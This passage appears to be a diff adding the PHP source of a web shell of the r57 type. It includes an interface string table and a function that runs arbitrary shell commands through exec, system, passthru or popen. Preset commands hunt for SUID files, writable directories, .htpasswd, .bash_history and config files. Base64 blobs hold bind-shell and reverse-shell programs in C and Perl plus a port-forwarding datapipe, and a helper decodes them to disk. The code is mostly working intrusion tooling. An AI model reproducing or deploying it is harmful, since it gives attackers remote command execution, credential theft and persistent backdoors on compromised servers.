Only read access!', +'eng_text45'=>'File saved', +'eng_text46'=>'Show phpinfo()', +'eng_text47'=>'Show variables from php.ini', +'eng_text48'=>'Delete temp files', +'eng_butt11'=>'Edit file', +'eng_text49'=>'Delete script from server', +'eng_text50'=>'View cpu info', +'eng_text51'=>'View memory info', +'eng_text52'=>'Find text', +'eng_text53'=>'In dirs', +'eng_text54'=>'Find text in files', +'eng_butt12'=>'Find', +'eng_text55'=>'Only in files', +'eng_text56'=>'Nothing :(', +'eng_text57'=>'Create/Delete File/Dir', +'eng_text58'=>'name', +'eng_text59'=>'file', +'eng_text60'=>'dir', +'eng_butt13'=>'Create/Delete', +'eng_text61'=>'File created', +'eng_text62'=>'Dir created', +'eng_text63'=>'File deleted', +'eng_text64'=>'Dir deleted', +'eng_text65'=>'Create', +'eng_text66'=>'Delete', +'eng_text67'=>'Chown/Chgrp/Chmod', +'eng_text68'=>'Command', +'eng_text69'=>'param1', +'eng_text70'=>'param2', +'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...", +'eng_text72'=>'Text for find', +'eng_text73'=>'Find in folder', +'eng_text74'=>'Find in files', +'eng_text75'=>'* you can use regexp', +'eng_text76'=>'Search text in files via find', +'eng_text77'=>'Show database structure', +'eng_text78'=>'show tables', +'eng_text79'=>'show columns', +'eng_text80'=>'Type', +'eng_text81'=>'Net', +'eng_text82'=>'Databases', +'eng_text83'=>'Run SQL query', +'eng_text84'=>'SQL query', +); +/* +?????? ?????? +????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? ) +?? ?????? ???? ????????? ??? ???????? ???????. +*/ +$aliases=array( +'find suid files'=>'find / -type f -perm -04000 -ls', +'find suid files in current dir'=>'find . -type f -perm -04000 -ls', +'find sgid files'=>'find / -type f -perm -02000 -ls', +'find sgid files in current dir'=>'find . 
-type f -perm -02000 -ls', +'find config.inc.php files'=>'find / -type f -name config.inc.php', +'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php', +'find config* files'=>'find / -type f -name "config*"', +'find config* files in current dir'=>'find . -type f -name "config*"', +'find all writable files'=>'find / -type f -perm -2 -ls', +'find all writable files in current dir'=>'find . -type f -perm -2 -ls', +'find all writable directories'=>'find / -type d -perm -2 -ls', +'find all writable directories in current dir'=>'find . -type d -perm -2 -ls', +'find all writable directories and files'=>'find / -perm -2 -ls', +'find all writable directories and files in current dir'=>'find . -perm -2 -ls', +'find all service.pwd files'=>'find / -type f -name service.pwd', +'find service.pwd files in current dir'=>'find . -type f -name service.pwd', +'find all .htpasswd files'=>'find / -type f -name .htpasswd', +'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd', +'find all .bash_history files'=>'find / -type f -name .bash_history', +'find .bash_history files in current dir'=>'find . -type f -name .bash_history', +'find all .mysql_history files'=>'find / -type f -name .mysql_history', +'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history', +'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc', +'find .fetchmailrc files in current dir'=>'find . 
-type f -name .fetchmailrc', +'list file attributes on a Linux second extended file system'=>'lsattr -va', +'show opened ports'=>'netstat -an | grep -i listen', +'----------------------------------------------------------------------------------------------------'=>'ls -la' +); +$table_up1 = "<tr><td bgcolor=#333333><font face=Verdana size=-2><b><div align=center>:: "; +$table_up2 = " ::</div></b></font></td></tr><tr><td>"; +$table_up3 = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333>"; +$table_end1 = "</td></tr>"; +$arrow = " <font face=Wingdings color=gray>?</font>"; +$lb = "<font color=black>[</font>"; +$rb = "<font color=black>]</font>"; +$font = "<font face=Verdana size=-2>"; +$ts = "<table class=table1 width=100% align=center>"; +$te = "</table>"; +$fs = "<form name=form method=POST>"; +$fe = "</form>"; + +if (!empty($_POST['dir'])) { @chdir($_POST['dir']); } +$dir = @getcwd(); +$windows = 0; +$unix = 0; +if(strlen($dir)>1 && $dir[1]==":") $windows=1; else $unix=1; +if(empty($dir)) + { + $os = getenv('OS'); + if(empty($os)){ $os = php_uname(); } + if(empty($os)){ $os ="-"; $unix=1; } + else + { + if(@eregi("^win",$os)) { $windows = 1; } + else { $unix = 1; } + } + } +if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text") + { + echo $head; + if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); } + else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); } + $sr->SearchText(0,0); + $res = $sr->GetResultFiles(); + $found = $sr->GetMatchesCount(); + $titles = $sr->GetTitles(); + $r = ""; + if($found > 0) + { + $r .= "<TABLE width=100%>"; + foreach($res as $file=>$v) + { + $r .= "<TR>"; + $r .= "<TD colspan=2><font face=Verdana size=-2><b>".ws(3); + $r .= ($windows)? 
str_replace("/","\\",$file) : $file; + $r .= "</b></font></ TD>"; + $r .= "</TR>"; + foreach($v as $a=>$b) + { + $r .= "<TR>"; + $r .= "<TD align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>"; + $r .= "<TD><font face=Verdana size=-2>".ws(2).$b."</font></TD>"; + $r .= "</TR>\n"; + } + } + $r .= "</TABLE>"; + echo $r; + } + else + { + echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>"; + } + echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; + die(); + } +if($windows&&!$safe_mode) + { + $uname = ex("ver"); + if(empty($uname)) { $safe_mode = 1; } + } +else if($unix&&!$safe_mode) + { + $uname = ex("uname"); + if(empty($uname)) { $safe_mode = 1; } + } +$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE'); +if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; } +function ws($i) +{ +return @str_repeat("&nbsp;",$i); +} +function ex($cfe) +{ + $res = ''; + if (!empty($cfe)) + { + if(function_exists('exec')) + { + @exec($cfe,$res); + $res = join("\n",$res); + } + elseif(function_exists('shell_exec')) + { + $res = @shell_exec($cfe); + } + elseif(function_exists('system')) + { + @ob_start(); + @system($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(function_exists('passthru')) + { + @ob_start(); + @passthru($cfe); + $res = @ob_get_contents(); + @ob_end_clean(); + } + elseif(@is_resource($f = @popen($cfe,"r"))) + { + $res = ""; + while(!@feof($f)) { $res .= @fread($f,1024); } + @pclose($f); + } + } + return $res; +} +function we($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! ?? ???? ???????? ? ???? '; } +else { $text = "[-] ERROR! Can't write in file "; } +echo "<table width=100% cellpadding=0 cellspacing=0><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function re($i) +{ +if($GLOBALS['language']=="ru"){ $text = '??????! 
?? ???? ????????? ???? '; } +else { $text = "[-] ERROR! Can't read file "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function ce($i) +{ +if($GLOBALS['language']=="ru"){ $text = "?? ??????? ??????? "; } +else { $text = "Can't create "; } +echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><font color=red face=Verdana size=-2><div align=center><b>".$text.$i."</b></div></font></td></tr></table>"; +return null; +} +function perms($mode) +{ +if ($GLOBALS['windows']) return 0; +if( $mode & 0x1000 ) { $type='p'; } +else if( $mode & 0x2000 ) { $type='c'; } +else if( $mode & 0x4000 ) { $type='d'; } +else if( $mode & 0x6000 ) { $type='b'; } +else if( $mode & 0x8000 ) { $type='-'; } +else if( $mode & 0xA000 ) { $type='l'; } +else if( $mode & 0xC000 ) { $type='s'; } +else $type='u'; +$owner["read"] = ($mode & 00400) ? 'r' : '-'; +$owner["write"] = ($mode & 00200) ? 'w' : '-'; +$owner["execute"] = ($mode & 00100) ? 'x' : '-'; +$group["read"] = ($mode & 00040) ? 'r' : '-'; +$group["write"] = ($mode & 00020) ? 'w' : '-'; +$group["execute"] = ($mode & 00010) ? 'x' : '-'; +$world["read"] = ($mode & 00004) ? 'r' : '-'; +$world["write"] = ($mode & 00002) ? 'w' : '-'; +$world["execute"] = ($mode & 00001) ? 'x' : '-'; +if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; +if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S'; +if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 
't' : 'T'; +$s=sprintf("%1s", $type); +$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); +$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); +$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); +return trim($s); +} +function in($type,$name,$size,$value) +{ + $ret = "<input type=".$type." name=".$name." "; + if($size != 0) { $ret .= "size=".$size." "; } + $ret .= "value=\"".$value."\">"; + return $ret; +} +function which($pr) +{ +$path = ex("which $pr"); +if(!empty($path)) { return $path; } else { return $pr; } +} +function cf($fname,$text) +{ + $w_file=@fopen($fname,"w") or we($fname); + if($w_file) + { + @fputs($w_file,@base64_decode($text)); + @fclose($w_file); + } +} +function sr($l,$t1,$t2) + { + return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>"; + } +if (!@function_exists("view_size")) +{ +function view_size($size) +{ + if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} + elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} + elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} + else {$size = $size . " B";} + return $size; +} +} +function DirFiles($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (FALSE !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(!is_dir($dir."/".$file)) + { + if($types) + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,@explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirFilesWide($dir) + { + $files = Array(); + $dirs = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + { + $file = @strtoupper($file); + $dirs[$file] = '&lt;DIR&gt;'; + } + else + $files[$file] = @filesize($dir."/".$file); + } + } + @closedir($handle); + @ksort($dirs); + @ksort($files); + $files = @array_merge($dirs,$files); + } + return $files; + } + function DirFilesR($dir,$types='') + { + $files = Array(); + if(($handle = @opendir($dir))) + { + while (false !== ($file = @readdir($handle))) + { + if ($file != "." && $file != "..") + { + if(@is_dir($dir."/".$file)) + $files = @array_merge($files,DirFilesR($dir."/".$file,$types)); + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if($types) + { + if(@in_array($ext,explode(';',$types))) + $files[] = $dir."/".$file; + } + else + $files[] = $dir."/".$file; + } + } + } + @closedir($handle); + } + return $files; + } + function DirPrintHTMLHeaders($dir) + { + $pockets = ''; + $handle = @opendir($dir) or die("Can't open directory $dir"); + echo " <ul style='margin-left: 0px; padding-left: 20px;'>\n"; + while (false !== ($file = @readdir($handle))) + { + if ($file != "." 
&& $file != "..") + { + if(@is_dir($dir."/".$file)) + { + echo " <li><b>[ $file ]</b></li>\n"; + DirPrintHTMLHeaders($dir."/".$file); + } + else + { + $pos = @strrpos($file,"."); + $ext = @substr($file,$pos,@strlen($file)-$pos); + if(@in_array($ext,array('.htm','.html'))) + { + $header = '-=None=-'; + $strings = @file($dir."/".$file) or die("Can't open file ".$dir."/".$file); + for($a=0;$a<count($strings);$a++) + { + $pattern = '(<title>(.+)</title>)'; + if(@eregi($pattern,$strings[$a],$pockets)) + { + $header = "&laquo;".$pockets[2]."&raquo;"; + break; + } + } + echo " <li>".$header."</li>\n"; + } + } + } + } + echo " </ul>\n"; + @closedir($handle); + } + + class SearchResult + { + var $text; + var $FilesToSearch; + var $ResultFiles; + var $FilesTotal; + var $MatchesCount; + var $FileMatschesCount; + var $TimeStart; + var $TimeTotal; + var $titles; + function SearchResult($dir,$text,$filter='') + { + $dirs = @explode(";",$dir); + $this->FilesToSearch = Array(); + for($a=0;$a<count($dirs);$a++) + $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter)); + $this->text = $text; + $this->FilesTotal = @count($this->FilesToSearch); + $this->TimeStart = getmicrotime(); + $this->MatchesCount = 0; + $this->ResultFiles = Array(); + $this->FileMatchesCount = Array(); + $this->titles = Array(); + } + function GetFilesTotal() { return $this->FilesTotal; } + function GetTitles() { return $this->titles; } + function GetTimeTotal() { return $this->TimeTotal; } + function GetMatchesCount() { return $this->MatchesCount; } + function GetFileMatchesCount() { return $this->FileMatchesCount; } + function GetResultFiles() { return $this->ResultFiles; } + function SearchText($phrase=0,$case=0) { + $qq = @explode(' ',$this->text); + $delim = '|'; + if($phrase) + foreach($qq as $k=>$v) + $qq[$k] = '\b'.$v.'\b'; + $words = '('.@implode($delim,$qq).')'; + $pattern = "/".$words."/"; + if(!$case) + $pattern .= 'i'; + foreach($this->FilesToSearch as $k=>$filename) 
+ { + $this->FileMatchesCount[$filename] = 0; + $FileStrings = @file($filename) or @next; + for($a=0;$a<@count($FileStrings);$a++) + { + $count = 0; + $CurString = $FileStrings[$a]; + $CurString = @Trim($CurString); + $CurString = @strip_tags($CurString); + $aa = ''; + if(($count = @preg_match_all($pattern,$CurString,$aa))) + { + $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString); + $this->ResultFiles[$filename][$a+1] = $CurString; + $this->MatchesCount += $count; + $this->FileMatchesCount[$filename] += $count; + } + } + } + $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4); + } + } + function getmicrotime() + { + list($usec,$sec) = @explode(" ",@microtime()); + return ((float)$usec + (float)$sec); + } +$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS +A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I +GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt +b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9 +pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF +NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK +ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog +ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk +7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2 +9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld 
+2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu +dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp +lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0="; +$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS +VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs +JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV +TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG +lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK +Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i +Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N +lIENPTk47DQpleGl0IDA7DQp9DQp9"; +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj +aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR +hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT +sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI +kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi +KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl +OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
+$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC +BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb +SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd +KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ +sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC +Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D +QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp +Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; +$datapipe_c="I2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxzeXMvd2FpdC5oPg0KI2luY2 +x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPGVycm5vLmg+DQojaW5jb +HVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCiNpbmNsdWRlIDxsaW51eC90aW1lLmg+DQojaWZkZWYgU1RSRVJST1INCmV4dGVybiBj +aGFyICpzeXNfZXJybGlzdFtdOw0KZXh0ZXJuIGludCBzeXNfbmVycjsNCmNoYXIgKnVuZGVmID0gIlVuZGVmaW5lZCBlcnJvciI7DQpjaGFyICpzdHJ +lcnJvcihlcnJvcikgIA0KaW50IGVycm9yOyAgDQp7IA0KaWYgKGVycm9yID4gc3lzX25lcnIpDQpyZXR1cm4gdW5kZWY7DQpyZXR1cm4gc3lzX2Vycm +xpc3RbZXJyb3JdOw0KfQ0KI2VuZGlmDQoNCm1haW4oYXJnYywgYXJndikgIA0KICBpbnQgYXJnYzsgIA0KICBjaGFyICoqYXJndjsgIA0KeyANCiAga +W50IGxzb2NrLCBjc29jaywgb3NvY2s7DQogIEZJTEUgKmNmaWxlOw0KICBjaGFyIGJ1Zls0MDk2XTsNCiAgc3RydWN0IHNvY2thZGRyX2luIGxhZGRy +LCBjYWRkciwgb2FkZHI7DQogIGludCBjYWRkcmxlbiA9IHNpemVvZihjYWRkcik7DQogIGZkX3NldCBmZHNyLCBmZHNlOw0KICBzdHJ1Y3QgaG9zdGV +udCAqaDsNCiAgc3RydWN0IHNlcnZlbnQgKnM7DQogIGludCBuYnl0Ow0KICB1bnNpZ25lZCBsb25nIGE7DQogIHVuc2lnbmVkIHNob3J0IG9wb3J0Ow 
+0KDQogIGlmIChhcmdjICE9IDQpIHsNCiAgICBmcHJpbnRmKHN0ZGVyciwiVXNhZ2U6ICVzIGxvY2FscG9ydCByZW1vdGVwb3J0IHJlbW90ZWhvc3Rcb +iIsYXJndlswXSk7DQogICAgcmV0dXJuIDMwOw0KICB9DQogIGEgPSBpbmV0X2FkZHIoYXJndlszXSk7DQogIGlmICghKGggPSBnZXRob3N0YnluYW1l +KGFyZ3ZbM10pKSAmJg0KICAgICAgIShoID0gZ2V0aG9zdGJ5YWRkcigmYSwgNCwgQUZfSU5FVCkpKSB7DQogICAgcGVycm9yKGFyZ3ZbM10pOw0KICA +gIHJldHVybiAyNTsNCiAgfQ0KICBvcG9ydCA9IGF0b2woYXJndlsyXSk7DQogIGxhZGRyLnNpbl9wb3J0ID0gaHRvbnMoKHVuc2lnbmVkIHNob3J0KS +hhdG9sKGFyZ3ZbMV0pKSk7DQogIGlmICgobHNvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNC +iAgICBwZXJyb3IoInNvY2tldCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBsYWRkci5zaW5fZmFtaWx5ID0gaHRvbnMoQUZfSU5FVCk7DQogIGxh +ZGRyLnNpbl9hZGRyLnNfYWRkciA9IGh0b25sKDApOw0KICBpZiAoYmluZChsc29jaywgJmxhZGRyLCBzaXplb2YobGFkZHIpKSkgew0KICAgIHBlcnJ +vcigiYmluZCIpOw0KICAgIHJldHVybiAyMDsNCiAgfQ0KICBpZiAobGlzdGVuKGxzb2NrLCAxKSkgew0KICAgIHBlcnJvcigibGlzdGVuIik7DQogIC +AgcmV0dXJuIDIwOw0KICB9DQogIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0gLTEpIHsNCiAgICBwZXJyb3IoImZvcmsiKTsNCiAgICByZXR1cm4gMjA7D +QogIH0NCiAgaWYgKG5ieXQgPiAwKQ0KICAgIHJldHVybiAwOw0KICBzZXRzaWQoKTsNCiAgd2hpbGUgKChjc29jayA9IGFjY2VwdChsc29jaywgJmNh +ZGRyLCAmY2FkZHJsZW4pKSAhPSAtMSkgew0KICAgIGNmaWxlID0gZmRvcGVuKGNzb2NrLCJyKyIpOw0KICAgIGlmICgobmJ5dCA9IGZvcmsoKSkgPT0 +gLTEpIHsNCiAgICAgIGZwcmludGYoY2ZpbGUsICI1MDAgZm9yazogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgICBzaHV0ZG93bihjc29jay +wyKTsNCiAgICAgIGZjbG9zZShjZmlsZSk7DQogICAgICBjb250aW51ZTsNCiAgICB9DQogICAgaWYgKG5ieXQgPT0gMCkNCiAgICAgIGdvdG8gZ290c +29jazsNCiAgICBmY2xvc2UoY2ZpbGUpOw0KICAgIHdoaWxlICh3YWl0cGlkKC0xLCBOVUxMLCBXTk9IQU5HKSA+IDApOw0KICB9DQogIHJldHVybiAy +MDsNCg0KIGdvdHNvY2s6DQogIGlmICgob3NvY2sgPSBzb2NrZXQoUEZfSU5FVCwgU09DS19TVFJFQU0sIElQUFJPVE9fVENQKSkgPT0gLTEpIHsNCiA +gICBmcHJpbnRmKGNmaWxlLCAiNTAwIHNvY2tldDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICBvYWRkci +5zaW5fZmFtaWx5ID0gaC0+aF9hZGRydHlwZTsNCiAgb2FkZHIuc2luX3BvcnQgPSBodG9ucyhvcG9ydCk7DQogIG1lbWNweSgmb2FkZHIuc2luX2FkZ 
+HIsIGgtPmhfYWRkciwgaC0+aF9sZW5ndGgpOw0KICBpZiAoY29ubmVjdChvc29jaywgJm9hZGRyLCBzaXplb2Yob2FkZHIpKSkgew0KICAgIGZwcmlu +dGYoY2ZpbGUsICI1MDAgY29ubmVjdDogJXNcbiIsIHN0cmVycm9yKGVycm5vKSk7DQogICAgZ290byBxdWl0MTsNCiAgfQ0KICB3aGlsZSAoMSkgew0 +KICAgIEZEX1pFUk8oJmZkc3IpOw0KICAgIEZEX1pFUk8oJmZkc2UpOw0KICAgIEZEX1NFVChjc29jaywmZmRzcik7DQogICAgRkRfU0VUKGNzb2NrLC +ZmZHNlKTsNCiAgICBGRF9TRVQob3NvY2ssJmZkc3IpOw0KICAgIEZEX1NFVChvc29jaywmZmRzZSk7DQogICAgaWYgKHNlbGVjdCgyMCwgJmZkc3IsI +E5VTEwsICZmZHNlLCBOVUxMKSA9PSAtMSkgew0KICAgICAgZnByaW50ZihjZmlsZSwgIjUwMCBzZWxlY3Q6ICVzXG4iLCBzdHJlcnJvcihlcnJubykp +Ow0KICAgICAgZ290byBxdWl0MjsNCiAgICB9DQogICAgaWYgKEZEX0lTU0VUKGNzb2NrLCZmZHNyKSB8fCBGRF9JU1NFVChjc29jaywmZmRzZSkpIHs +NCiAgICAgIGlmICgobmJ5dCA9IHJlYWQoY3NvY2ssYnVmLDQwOTYpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgICBpZiAoKHdyaXRlKG9zb2NrLG +J1ZixuYnl0KSkgPD0gMCkNCglnb3RvIHF1aXQyOw0KICAgIH0gZWxzZSBpZiAoRkRfSVNTRVQob3NvY2ssJmZkc3IpIHx8IEZEX0lTU0VUKG9zb2NrL +CZmZHNlKSkgew0KICAgICAgaWYgKChuYnl0ID0gcmVhZChvc29jayxidWYsNDA5NikpIDw9IDApDQoJZ290byBxdWl0MjsNCiAgICAgIGlmICgod3Jp +dGUoY3NvY2ssYnVmLG5ieXQpKSA8PSAwKQ0KCWdvdG8gcXVpdDI7DQogICAgfQ0KICB9DQoNCiBxdWl0MjoNCiAgc2h1dGRvd24ob3NvY2ssMik7DQo 